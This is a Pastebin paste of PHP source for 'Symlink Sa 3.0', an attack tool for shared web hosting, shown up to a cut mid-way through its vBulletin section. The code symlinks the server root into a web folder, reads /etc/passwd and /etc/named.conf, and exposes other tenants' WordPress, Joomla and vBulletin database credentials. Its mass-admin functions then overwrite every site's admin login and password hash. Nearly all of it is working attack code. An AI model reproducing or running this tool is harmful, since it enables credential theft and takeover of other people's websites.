API tools faq
paste
cesabot

Untitled

cesabot
Aug 5th, 2017
39
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 25.64 KB | None | 0 0
raw download clone embed print report
  1. <?php
  2.  
  3. /*
  4.  
  5. .d8888. d88888b .o88b. db d8b db .o88b. .d88b. .88b d88.
  6. 88' YP 88' d8P Y8 88 I8I 88 d8P Y8 .8P Y8. 88'YbdP`88
  7. `8bo. 88ooooo 8P 88 I8I 88 8P 88 88 88 88 88
  8. `Y8b. 88~~~~~ 8b C8888D Y8 I8I 88 8b 88 88 88 88 88
  9. db 8D 88. Y8b d8 `8b d8'8b d8' db Y8b d8 `8b d8' 88 88 88
  10. `8888Y' Y88888P `Y88P' `8b8' `8d8' VP `Y88P' `Y88P' YP YP YP
  11.  
  12.  
  13. author..............: s3n4t00r
  14. home................:
  15. twitter.............: @s3n4t00r
  16. name tools..........: Symlink Sa v3.0
  17.  
  18. */
  19.  
  20.  
  21.  
  22. set_time_limit(0);
  23. error_reporting(0);
  24.  
  25.  
  26. $pageURL = 'http://'.$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
  27. $u = explode("/",$pageURL );
  28. $pageURL =str_replace($u[count($u)-1],"",$pageURL );
  29.  
  30. $pageFTP = 'ftp://'.$_SERVER["SERVER_NAME"].'/public_html/'.$_SERVER["REQUEST_URI"];
  31. $u = explode("/",$pageFTP );
  32. $pageFTP =str_replace($u[count($u)-1],"",$pageFTP );
  33.  
  34. ?>
  35. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  36. "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  37.  
  38. <html xmlns="http://www.w3.org/1999/xhtml">
  39.  
  40. <head>
  41. <title>Symlink_Sa 3.0</title>
  42.  
  43. <style type="text/css">
  44.  
  45. html,body {
  46. margin: 0;
  47. padding: 0;
  48. outline: 0;
  49. }
  50. a{
  51.  
  52. font-size: 13px;
  53.  
  54. }
  55.  
  56.  
  57. body {
  58. direction: ltr;
  59. background-color:#F4F4F4;
  60. color: rgb(153, 153, 153);
  61. text-align: center
  62. }
  63.  
  64.  
  65.  
  66. input,textarea,select{
  67. font-weight: bold;
  68. color: #000000;
  69. }
  70.  
  71. input,textarea,select:hover{
  72. box-shadow: 0px 0px 4px #AAAAAA;
  73. }
  74.  
  75.  
  76. .hedr {
  77. font-family: Tahoma, Arial, sans-serif ;
  78. font-size: 22px;
  79.  
  80.  
  81. }
  82.  
  83. .cont a{
  84.  
  85. text-decoration: none;
  86. color:rgb(153, 153, 153);
  87. font-family: Tahoma, Arial, sans-serif ;
  88. font-size: 16px;
  89. text-shadow: 0px 0px 3px ;
  90. }
  91.  
  92. .cont a:hover{
  93.  
  94.  
  95. color: #EEEEEE ;
  96. text-shadow:0px 0px 3px #000000 ;
  97.  
  98.  
  99. }
  100.  
  101. .tmp tr td{
  102.  
  103. border: solid 1px #BBBBBB;
  104.  
  105. padding: 2px ;
  106. font-size: 13px;
  107. }
  108.  
  109. .tmp tr td a {
  110. text-decoration: none;
  111.  
  112.  
  113.  
  114. }
  115.  
  116. .foter{
  117. font-size: 9pt;
  118. color: #AAAAAA ;
  119. text-align: center
  120. }
  121.  
  122. .tmp tr td:hover{
  123.  
  124. box-shadow: 0px 0px 4px #888888;
  125.  
  126. }
  127. .fot{
  128.  
  129. font-family:Tahoma, Arial, sans-serif;
  130.  
  131. font-size: 11pt;
  132. }
  133. .for a : hover{
  134.  
  135. text-shadow: 0px 0px 1px #3366FF;
  136.  
  137. }
  138.  
  139.  
  140. .ir {
  141. color: #FF0000;
  142. }
  143.  
  144.  
  145.  
  146. </style>
  147.  
  148. </head>
  149.  
  150. <body>
  151.  
  152. <div class='all'>
  153.  
  154.  
  155. <?php
  156.  
  157. @mkdir('sym',0777);
  158. $htcs = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  159. $f =@fopen ('sym/.htaccess','w');
  160. fwrite($f , $htcs);
  161.  
  162.  
  163.  
  164. @symlink("/","sym/root");
  165.  
  166. $pg = basename(__FILE__);
  167.  
  168. echo '<br /><div class="hedr"> Symlink Sa 3.0 <br /></div>' ;
  169.  
  170. echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>' ;
  171.  
  172. echo '<div class="cont">
  173.  
  174. [<a href="?"> Home </a>]
  175.  
  176. [<a href="?sws=sym"> User & Domains & Symlink </a>]
  177.  
  178. [<a href="?sws=sec"> Domains & Script </a>]
  179.  
  180. [ <a href="?sws=file"> Symlink File </a>]
  181.  
  182. [<a href="?sws=passwd"> Symlink Bypass </a>]
  183.  
  184. <br /><br />
  185.  
  186. [ <a href="?sws=read"> Bypass Read </a>]
  187.  
  188. [ <a href="?sws=joomla"> Mass Joomla </a>]
  189.  
  190. [ <a href="?sws=wp"> Mass WordPress </a>]
  191.  
  192. [ <a href="?sws=vb"> Mass vBulletin </a>]
  193.  
  194. [ <a href="?sws=help"> Help </a>]
  195.  
  196. <br /><br /><br />
  197.  
  198.  
  199.  
  200.  
  201.  
  202.  
  203. </div>';
  204.  
  205. if(isset($_REQUEST['sws']))
  206. {
  207.  
  208. switch ($_REQUEST['sws'])
  209. {
  210.  
  211.  
  212.  
  213.  
  214.  
  215. /// Domains + Scripts ///
  216.  
  217. case 'sec':
  218.  
  219. if(!@is_file('named.txt')){
  220.  
  221. $d00m = @file("/etc/named.conf");
  222.  
  223. }else{
  224.  
  225. $d00m = @file("named.txt");
  226.  
  227.  
  228. }
  229. if(!$d00m)
  230. {
  231.  
  232. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  233. }
  234. else
  235.  
  236. {
  237. echo "<div class='tmp'>
  238. <table align='center' width='40%'><td> Domains </td><td> Script </td>";
  239. foreach($d00m as $dom){
  240.  
  241. flush();
  242. flush();
  243.  
  244.  
  245.  
  246. if(eregi("zone",$dom)){
  247.  
  248. @preg_match_all('#zone "(.*)"#', $dom, $domsws);
  249.  
  250. flush();
  251.  
  252. if(@strlen(trim($domsws[1][0])) > 2){
  253.  
  254. $user = @posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  255.  
  256. ///////////////////////////////////////////////////////////////////////////////////
  257.  
  258. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  259. $wpp=@get_headers($wpl);
  260. $wp=$wpp[0];
  261.  
  262. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  263. $wpp2=@get_headers($wp2);
  264. $wp12=$wpp2[0];
  265.  
  266. ///////////////////////////////
  267.  
  268. $jo1=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  269. $joo=@get_headers($jo1);
  270. $jo=$joo[0];
  271.  
  272.  
  273. $jo2=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  274. $joo2=@get_headers($jo2);
  275. $jo12=$joo2[0];
  276.  
  277. ////////////////////////////////
  278.  
  279. $vb1=$pageURL."/sym/root/home/".$user['name']."/public_html/includes/config.php";
  280. $vbb=@get_headers($vb1);
  281. $vb=$vbb[0];
  282.  
  283. $vb2=$pageURL."/sym/root/home/".$user['name']."/public_html/vb/includes/config.php";
  284. $vbb2=@get_headers($vb2);
  285. $vb12=$vbb2[0];
  286.  
  287. $vb3=$pageURL."/sym/root/home/".$user['name']."/public_html/forum/includes/config.php";
  288. $vbb3=@get_headers($vb3);
  289. $vb13=$vbb3[0];
  290.  
  291. /////////////////
  292.  
  293. $wh1=$pageURL."/sym/root/home/".$user['name']."public_html/clients/configuration.php";
  294. $whh2= @get_headers($wh1);
  295. $wh=$whh2[0];
  296.  
  297. $wh2=$pageURL."/sym/root/home/".$user['name']."/public_html/support/configuration.php";
  298. $whh2= @get_headers($wh2);
  299. $wh12=$whh2[0];
  300.  
  301. $wh3=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  302. $whh3= @get_headers($wh3);
  303. $wh13=$whh3[0];
  304.  
  305. $wh5=$pageURL."/sym/root/home/".$user['name']."/public_html/submitticket.php";
  306. $whh5= @get_headers($wh5);
  307. $wh15=$whh5[0];
  308.  
  309. $wh4=$pageURL."/sym/root/home/".$user['name']."/public_html/client/configuration.php";
  310. $whh4= @get_headers($wh4);
  311. $wh14=$whh4[0];
  312.  
  313.  
  314.  
  315. ////////////////////////////////////////////////////////////////////////////////
  316.  
  317. ////////// Wordpress ////////////
  318.  
  319. $pos = strpos($wp, "200");
  320. $config="&nbsp;";
  321.  
  322. if (strpos($wp, "200") == true )
  323. {
  324. $config="<a href='".$wpl."' target='_blank'>Wordpress</a>";
  325. }
  326. elseif (strpos($wp12, "200") == true)
  327. {
  328. $config="<a href='".$wp2."' target='_blank'>Wordpress</a>";
  329. }
  330.  
  331. ///////////WHMCS////////
  332.  
  333. elseif (strpos($jo, "200") == true and strpos($wh15, "200") == true )
  334. {
  335. $config=" <a href='".$wh5."' target='_blank'>WHMCS</a>";
  336.  
  337. }
  338. elseif (strpos($wh12, "200") == true)
  339. {
  340. $config =" <a href='".$wh2."' target='_blank'>WHMCS</a>";
  341. }
  342.  
  343. elseif (strpos($wh13, "200") == true)
  344. {
  345. $config =" <a href='".$wh3."' target='_blank'>WHMCS</a>";
  346.  
  347. }
  348.  
  349. ///////// Joomla to 4 ///////////
  350.  
  351. elseif (strpos($jo, "200") == true)
  352. {
  353. $config=" <a href='".$jo1."' target='_blank'>Joomla</a>";
  354. }
  355.  
  356. elseif (strpos($jo12, "200") == true)
  357. {
  358. $config=" <a href='".$jo2."' target='_blank'>Joomla</a>";
  359. }
  360.  
  361. //////////vBulletin to 4 ///////////
  362.  
  363. elseif (strpos($vb, "200") == true)
  364. {
  365. $config=" <a href='".$vb1."' target='_blank'>vBulletin</a>";
  366. }
  367.  
  368. elseif (strpos($vb12, "200") == true)
  369. {
  370. $config=" <a href='".$vb2."' target='_blank'>vBulletin</a>";
  371. }
  372.  
  373. elseif (strpos($vb13, "200") == true)
  374. {
  375. $config=" <a href='".$vb3."' target='_blank'>vBulletin</a>";
  376. }
  377.  
  378. else
  379. {
  380. continue;
  381. }
  382. flush();
  383. flush();
  384.  
  385. /////////////////////////////////////////////////////////////////////////////////////
  386.  
  387.  
  388.  
  389. $site = $user['name'] ;
  390.  
  391.  
  392.  
  393. flush();
  394.  
  395. echo "<tr><td><a href=http://www.".$domsws[1][0]."/>".$domsws[1][0]."</a></td>
  396. <td>".$config."</td></tr>"; flush();
  397.  
  398. }
  399. }
  400. }
  401. }
  402.  
  403.  
  404.  
  405.  
  406. break;
  407.  
  408.  
  409. /// user + domine + symlink ///
  410.  
  411. case 'sym':
  412.  
  413. if(!is_file('named.txt')){
  414.  
  415. $d00m = @file("/etc/named.conf");
  416.  
  417. }else{
  418.  
  419. $d00m = @file("named.txt");
  420.  
  421.  
  422. }
  423. if(!$d00m)
  424. {
  425.  
  426. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  427. }
  428. else
  429.  
  430. {
  431. echo "<div class='tmp'><table align='center' width='40%'><td>Domains</td><td>Users</td><td>symlink </td>";
  432. foreach($d00m as $dom){
  433.  
  434. if(eregi("zone",$dom)){
  435.  
  436. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  437.  
  438. flush();
  439.  
  440. if(strlen(trim($domsws[1][0])) > 2){
  441.  
  442. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  443.  
  444. flush();
  445.  
  446.  
  447.  
  448. $site = $user['name'] ;
  449.  
  450.  
  451. @symlink("/","sym/root");
  452.  
  453. $site = $domsws[1][0];
  454.  
  455. $ir = 'ir';
  456.  
  457. $il = 'il';
  458.  
  459. if (preg_match("/.^$ir/",$domsws[1][0]) or preg_match("/.^$il/",$domsws[1][0]) )
  460. {
  461. $site = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$domsws[1][0]."</div>";
  462. }
  463.  
  464.  
  465. echo "
  466. <tr>
  467.  
  468. <td>
  469. <div class='dom'><a target='_blank' href=http://www.".$domsws[1][0]."/>".$site." </a> </div>
  470. </td>
  471.  
  472.  
  473. <td>
  474. ".$user['name']."
  475. </td>
  476.  
  477.  
  478.  
  479.  
  480.  
  481.  
  482. <td>
  483. <a href='sym/root/home/".$user['name']."/public_html' target='_blank'>symlink </a>
  484. </td>
  485.  
  486.  
  487. </tr></div> ";
  488.  
  489.  
  490. flush();
  491. flush();
  492.  
  493. }
  494. }
  495. }
  496. }
  497.  
  498.  
  499.  
  500.  
  501. break;
  502.  
  503.  
  504. /// file symlink ///
  505.  
  506. case 'file':
  507.  
  508. echo'
  509. The file path to symlink
  510.  
  511. <br /><br />
  512. <form method="post">
  513. <input type="text" name="file" value="/home/user/public_html/file.name" size="60"/><br /><br />
  514. <input type="text" name="symfile" value="file.name_sym ( Ex. :: royaliste.txt )" size="60"/><br /><br />
  515. <input type="submit" value="symlink" name="symlink" /> <br /><br />
  516.  
  517.  
  518.  
  519. </form>
  520. ';
  521.  
  522. $pfile = $_POST['file'];
  523. $symfile = $_POST['symfile'];
  524. $symlink = $_POST['symlink'];
  525.  
  526. if ($symlink)
  527. {
  528.  
  529.  
  530. @mkdir('sym1',0777);
  531. $c = "Options Indexes FollowSymLinks \n DirectoryIndex ssssss.htm \n AddType txt .php \n AddHandler txt .php \n AddType txt .html \n AddHandler txt .html \n Options all \n Options \n Allow from all \n Require None \n Satisfy Any";
  532. $f =@fopen ('sym1/.htaccess','w');
  533. @fwrite($f , $c);
  534.  
  535. @symlink("$pfile","sym1/$symfile");
  536.  
  537. echo '<br /><a target="_blank" href="sym1/'.$symfile.'" >'.$symfile.'</a>';
  538.  
  539. }
  540.  
  541.  
  542.  
  543. break;
  544.  
  545. /// bypass read
  546.  
  547. case 'read':
  548.  
  549. echo "read /etc/named.conf";
  550. echo "<br /><br /><form method='post' action='?sws=read&save=1'><textarea cols='80' rows='20' name='file'>";
  551. flush();
  552. flush();
  553.  
  554.  
  555. $file = '/etc/named.conf';
  556.  
  557.  
  558. $r3ad = @fopen($file, 'r');
  559. if ($r3ad){
  560. $content = @fread($r3ad, @filesize($file));
  561. echo "".htmlentities($content)."";
  562. }
  563. else if (!$r3ad)
  564. {
  565. $r3ad = @show_source($file) ;
  566. }
  567. else if (!$r3ad)
  568. {
  569. $r3ad = @highlight_file($file);
  570. }
  571. else if (!$r3ad)
  572. {
  573. $sm = @symlink($file,'sym.txt');
  574.  
  575.  
  576. if ($sm){
  577. $r3ad = @fopen('sym/sym.txt', 'r');
  578. $content = @fread($r3ad, @filesize($file));
  579. echo "".htmlentities($content)."";
  580.  
  581. }
  582. }
  583.  
  584.  
  585.  
  586. echo "</textarea><br /><br /><input type='submit' value='Save'/> </form>";
  587.  
  588.  
  589. if(isset($_GET['save'])){
  590.  
  591.  
  592. $cont = stripcslashes($_POST['file']);
  593.  
  594. $f = fopen('named.txt','w');
  595.  
  596. $w = fwrite($f,$cont);
  597.  
  598. if($w){
  599.  
  600. echo '<br />save has been successfully';
  601.  
  602. }
  603.  
  604. fclose($f);
  605.  
  606.  
  607.  
  608.  
  609. }
  610.  
  611.  
  612.  
  613. break;
  614.  
  615. // passwd
  616.  
  617. case 'passwd':
  618.  
  619. if(isset($_GET['save']) and isset($_POST['file']) or @filesize('passwd.txt') > 0){
  620.  
  621.  
  622. $cont = stripcslashes($_POST['file']);
  623.  
  624. if(!file_exists('passwd.txt')){
  625.  
  626. $f = @fopen('passwd.txt','w');
  627.  
  628. $w = @fwrite($f,$cont);
  629.  
  630. fclose($f);
  631. }
  632. if($w or @filesize('passwd.txt') > 0){
  633. // * SHOW * //
  634.  
  635. echo "<div class='tmp'><table align='center' width='35%'><td>Users</td><td>symlink</td><td>FTP</td>";
  636. flush();
  637.  
  638. $fil3 = file('passwd.txt');
  639.  
  640. foreach ($fil3 as $f){
  641.  
  642. $u=explode(':', $f);
  643. $user = $u['0'];
  644.  
  645.  
  646.  
  647. echo "
  648. <tr>
  649.  
  650.  
  651.  
  652. <td width='15%'>
  653. $user
  654. </td>
  655.  
  656.  
  657.  
  658.  
  659.  
  660.  
  661. <td width='10%'>
  662. <a href='sym/root/home/$user/public_html' target='_blank'>Symlink </a>
  663. </td>
  664.  
  665. <td width='10%'>
  666. <a href='$pageFTP/sym/root/home/$user/public_html' target='_blank'>FTP</a>
  667. </td>
  668.  
  669.  
  670.  
  671. </tr></div> ";
  672.  
  673.  
  674. flush();
  675. flush();
  676.  
  677.  
  678. }
  679.  
  680.  
  681.  
  682.  
  683.  
  684.  
  685. die ("</tr></div>");
  686.  
  687.  
  688. }
  689.  
  690.  
  691.  
  692.  
  693.  
  694. }
  695.  
  696.  
  697.  
  698. echo "read /etc/passwd";
  699. echo "<br /><br /><form method='post' action='?sws=passwd&save=1'><textarea cols='80' rows='20' name='file'>";
  700. flush();
  701.  
  702. $file = '/etc/passwd';
  703.  
  704.  
  705. $r3ad = @fopen($file, 'r');
  706. if ($r3ad){
  707. $content = @fread($r3ad, @filesize($file));
  708. echo "".htmlentities($content)."";
  709. }
  710. elseif(!$r3ad)
  711. {
  712. $r3ad = @show_source($file) ;
  713. }
  714. elseif(!$r3ad)
  715. {
  716. $r3ad = @highlight_file($file);
  717. }
  718. elseif(!$r3ad)
  719. {
  720.  
  721. for($uid=0;$uid<1000;$uid++){
  722. $ara = posix_getpwuid($uid);
  723. if (!empty($ara)) {
  724. while (list ($key, $val) = each($ara)){
  725. print "$val:";
  726. }
  727. print "\n";
  728. }
  729.  
  730. }
  731.  
  732. }
  733.  
  734.  
  735. flush();
  736.  
  737.  
  738. echo "</textarea><br /><br /><input type='submit' value='&nbsp;&nbsp;symlink&nbsp;&nbsp;'/> </form>";
  739. flush();
  740.  
  741. break;
  742.  
  743.  
  744.  
  745. case 'joomla':
  746.  
  747. /////////////////////////////////////////////////////////////////// xxxxxxxxxxxxxxxxxxx ////////////////////////////
  748.  
  749.  
  750. if(isset($_POST['s'])){
  751.  
  752. $file = @file_get_contents('joomla.txt');
  753.  
  754. $ex = explode("\n",$file);
  755.  
  756. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  757. flush();
  758.  
  759.  
  760. foreach ($ex as $exp){
  761.  
  762. $es = explode("||",$exp);
  763.  
  764. $config = $es[0];
  765.  
  766. $domin = $es[1];
  767.  
  768. $domins = trim($domin).'';
  769.  
  770. $readconfig = @file_get_contents(trim($config));
  771.  
  772. if(ereg('JConfig',$readconfig)){
  773.  
  774.  
  775.  
  776. $pass = ex($readconfig,'$password = \'',"';");
  777.  
  778. $userdb = ex($readconfig,'$user = \'',"';");
  779.  
  780. $db = ex($readconfig,'$db = \'',"';");
  781.  
  782. $fix = ex($readconfig,'$dbprefix = \'',"';");
  783.  
  784. $tab = $fix.'users';
  785.  
  786.  
  787. $con = @mysql_connect('localhost',$userdb,$pass);
  788.  
  789. $db = @mysql_select_db($db,$con);
  790.  
  791. $query = @mysql_query("UPDATE `$tab` SET `username` ='sec-w.com'");
  792.  
  793.  
  794. $query3 = @mysql_query("UPDATE `$tab` SET `password` ='44a0bcda611514625ba94e0b1c0bdaed:2iets9ydjR3iOdSuyvW54pIzyF9M1P5J'");
  795.  
  796.  
  797. if ($query and $query3 ){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}else{$r = '<b style="color:red">failed</b>';}
  798.  
  799. $domins = trim($domin).'';
  800.  
  801. echo "<tr>
  802. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  803. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  804. flush();
  805.  
  806.  
  807.  
  808. }else{
  809.  
  810. echo "<tr>
  811. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  812. <td><a target='_blank' href='http://$exp'>config</a></td><td><b style='color:red'>failed</b></td></tr>";
  813. flush();
  814.  
  815. }
  816.  
  817. }
  818.  
  819.  
  820.  
  821.  
  822.  
  823.  
  824.  
  825.  
  826.  
  827. die();
  828.  
  829. }
  830.  
  831. if(!is_file('named.txt')){
  832.  
  833. $d00m = @file("/etc/named.conf");
  834.  
  835. flush();
  836.  
  837.  
  838. }else{
  839.  
  840. $d00m = file("named.txt");
  841.  
  842.  
  843. }
  844. if(!$d00m)
  845. {
  846.  
  847. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  848. }
  849. else
  850.  
  851. {
  852. echo "<div class='tmp'>
  853. <form method='POST' action='$pg?sws=joomla'>
  854. <input type='submit' value='Mass ching Admin' />
  855. <input type='hidden' value='1' name='s' />
  856. </form><br /><br />
  857. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  858.  
  859. $f = fopen('joomla.txt','w');
  860.  
  861. foreach($d00m as $dom){
  862.  
  863. if(eregi("zone",$dom)){
  864.  
  865. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  866.  
  867. if(strlen(trim($domsws[1][0])) > 2){
  868.  
  869. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  870.  
  871. ///////////////////////////////////////////////////////////////////////////////////
  872.  
  873. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/configuration.php";
  874. $wpp=get_headers($wpl);
  875. $wp=$wpp[0];
  876.  
  877. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/configuration.php";
  878. $wpp2=get_headers($wp2);
  879. $wp12=$wpp2[0];
  880.  
  881. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/joomla/configuration.php";
  882. $wpp3=get_headers($wp3);
  883. $wp13=$wpp3[0];
  884.  
  885.  
  886. ////////// joomla ////////////
  887.  
  888. $pos = strpos($wp, "200");
  889. $config="&nbsp;";
  890.  
  891. if (strpos($wp, "200") == true )
  892. {
  893. $config= $wpl;
  894. }
  895. elseif (strpos($wp12, "200") == true)
  896. {
  897. $config= $wp2;
  898. }
  899. elseif (strpos($wp13, "200") == true)
  900. {
  901. $config= $wp3;
  902. }
  903. else
  904. {
  905. continue;
  906.  
  907. }
  908. flush();
  909.  
  910. /////////////////////////////////////////////////////////////////////////////////////
  911.  
  912. $dom = $domsws[1][0];
  913.  
  914. $w = fwrite($f,"$config||$dom \n");
  915. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  916.  
  917.  
  918. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  919. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  920.  
  921.  
  922.  
  923.  
  924.  
  925. flush();
  926.  
  927.  
  928. }
  929. }
  930. }
  931. }
  932.  
  933.  
  934. break;
  935.  
  936. case 'wp':
  937.  
  938. ############################ index #########################3
  939.  
  940.  
  941.  
  942.  
  943.  
  944.  
  945. ######## admin ##########33
  946.  
  947. if(isset($_POST['s'])){
  948.  
  949. $file = @file_get_contents('wp.txt');
  950.  
  951. $ex = explode("\n",$file);
  952.  
  953. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  954. flush();
  955. flush();
  956.  
  957.  
  958. foreach ($ex as $exp){
  959.  
  960. $es = explode("||",$exp);
  961.  
  962. $config = $es[0];
  963.  
  964. $domin = $es[1];
  965.  
  966. $domins = trim($domin).'';
  967.  
  968. $readconfig = @file_get_contents(trim($config));
  969.  
  970. if(ereg('wp-settings.php',$readconfig)){
  971.  
  972.  
  973.  
  974. $pass = ex($readconfig,"define('DB_PASSWORD', '","');");
  975.  
  976. $userdb = ex($readconfig,"define('DB_USER', '","');");
  977.  
  978. $db = ex($readconfig,"define('DB_NAME', '","');");
  979.  
  980. $fix = ex($readconfig,'$table_prefix = \'',"';");
  981.  
  982. $tab = $fix.'users';
  983.  
  984. $con = @mysql_connect('localhost',$userdb,$pass);
  985.  
  986. $db = @mysql_select_db($db,$con);
  987.  
  988. $query = @mysql_query("UPDATE `$tab` SET `user_login` ='sec-w.com'") or die;
  989.  
  990. $query = @mysql_query("UPDATE `$tab` SET `user_pass` ='$1$4z/.5i..$9aHYB.fUHEmNZ.eIKYTwx/'") or die;
  991.  
  992.  
  993.  
  994. if ($query){$r = '<b style="color: #006600">Succeed </b>user [sec-w.com] pass [1]</b>';}
  995.  
  996. else
  997.  
  998. {
  999.  
  1000. $r = '<b style="color:red">failed</b>';
  1001.  
  1002. }
  1003.  
  1004. $domins = trim($domin).'';
  1005.  
  1006. echo "<tr>
  1007. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1008. <td><a target='_blank' href='$config'>config</a></td><td>".$r."</td></tr>";
  1009.  
  1010. flush();
  1011. flush();
  1012.  
  1013.  
  1014.  
  1015.  
  1016.  
  1017.  
  1018. }else{
  1019.  
  1020. echo "<tr>
  1021. <td><a target='_blank' href='http://$domins'>$domin</a></td>
  1022. <td><a target='_blank' href='http://$config'>config</a></td><td><b style='color:red'>failed2</b></td></tr>";
  1023.  
  1024. flush();
  1025. flush();
  1026.  
  1027. }
  1028.  
  1029. }
  1030.  
  1031.  
  1032.  
  1033.  
  1034.  
  1035.  
  1036.  
  1037.  
  1038.  
  1039.  
  1040. die();
  1041.  
  1042. }
  1043.  
  1044. if(!is_file('named.txt')){
  1045.  
  1046. $d00m = @file("/etc/named.conf");
  1047.  
  1048. }else{
  1049.  
  1050. $d00m = @file("named.txt");
  1051.  
  1052.  
  1053. }
  1054. if(!$d00m)
  1055. {
  1056.  
  1057. die ("<meta http-equiv='refresh' content='0; url=?sws=read'/>");
  1058. }
  1059. else
  1060.  
  1061. {
  1062. echo "<div class='tmp'>
  1063. <form method='POST' action='$pg?sws=wp'>
  1064. <input type='submit' value='Mass Change Admin' />
  1065. <input type='hidden' value='1' name='s' />
  1066. </form>
  1067. <br /><br />
  1068. <table align='center' width='40%'><td> Domains </td><td> config </td><td> Result </td>";
  1069.  
  1070. flush();
  1071. flush();
  1072.  
  1073. $f = fopen('wp.txt','w');
  1074.  
  1075. foreach($d00m as $dom){
  1076.  
  1077. if(eregi("zone",$dom)){
  1078.  
  1079. preg_match_all('#zone "(.*)"#', $dom, $domsws);
  1080.  
  1081. if(strlen(trim($domsws[1][0])) > 2){
  1082.  
  1083. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domsws[1][0]));
  1084.  
  1085. ///////////////////////////////////////////////////////////////////////////////////
  1086.  
  1087. $wpl=$pageURL."/sym/root/home/".$user['name']."/public_html/wp-config.php";
  1088. $wpp=get_headers($wpl);
  1089. $wp=$wpp[0];
  1090.  
  1091. $wp2=$pageURL."/sym/root/home/".$user['name']."/public_html/blog/wp-config.php";
  1092. $wpp2=get_headers($wp2);
  1093. $wp12=$wpp2[0];
  1094.  
  1095. $wp3=$pageURL."/sym/root/home/".$user['name']."/public_html/wp/wp-config";
  1096. $wpp3=get_headers($wp3);
  1097. $wp13=$wpp3[0];
  1098.  
  1099.  
  1100. ////////// wp ////////////
  1101.  
  1102. $pos = strpos($wp, "200");
  1103. $config="&nbsp;";
  1104.  
  1105. if (strpos($wp, "200") == true )
  1106. {
  1107. $config= $wpl;
  1108. }
  1109. elseif (strpos($wp12, "200") == true)
  1110. {
  1111. $config= $wp2;
  1112. }
  1113. elseif (strpos($wp13, "200") == true)
  1114. {
  1115. $config= $wp3;
  1116. }
  1117. else
  1118. {
  1119. continue;
  1120.  
  1121. }
  1122. flush();
  1123.  
  1124. /////////////////////////////////////////////////////////////////////////////////////
  1125.  
  1126. $dom = $domsws[1][0];
  1127.  
  1128. $w = fwrite($f,"$config||$dom \n");
  1129. if($w){$r = '<b style="color: #006600">Save</b>';}else{$r = '<b style="color:red">failed</b>';}
  1130.  
  1131.  
  1132. echo "<tr><td><a href=http://www.".$domsws[1][0].">".$domsws[1][0]."</a></td>
  1133. <td><a href='$config'>config</a></td><td>".$r."</td></tr>";
  1134. flush();
  1135. flush();
  1136.  
  1137.  
  1138.  
  1139.  
  1140.  
  1141. flush();
  1142.  
  1143.  
  1144. }
  1145. }
  1146. }
  1147. }
  1148.  
  1149.  
  1150. break;
  1151.  
  1152.  
  1153. case 'vb':
  1154.  
  1155.  
  1156. if(isset($_POST['s'])){
  1157.  
  1158.  
  1159.  
  1160. $file = @file_get_contents('vb.txt');
  1161.  
  1162. $ex = explode("\n",$file);
  1163.  
  1164. echo "<div class='tmp'><table align='center' width='40%'><td> domin </td><td> config </td><td> Result </td>";
  1165.  
  1166.  
  1167. foreach ($ex as $exp){
  1168.  
  1169. $es = explode("||",$exp);
  1170.  
  1171. $config = $es[0];
  1172.  
  1173. $domin = $es[1];
  1174.  
  1175. $domins = trim($domin).'';
  1176.  
  1177. $readconfig = @file_get_contents(trim($config));
  1178.  
  1179. if(ereg('vBulletin',$readconfig)){
  1180.  
  1181.  
  1182.  
  1183. $db = ex($readconfig,'$config[\'Database\'][\'dbname\'] = \'',"';");
  1184.  
  1185. $userdb = ex($readconfig,'$config[\'MasterServer\'][\'username\'] = \'',"';");
  1186.  
  1187. $pass = ex($readconfig,'$config[\'MasterServer\'][\'password\'] = \'',"';");
  1188.  
  1189. $con = @mysql_connect('localhost',$userdb,$pass);
  1190.  
  1191. $db = @mysql_select_db($db,$con);
  1192.  
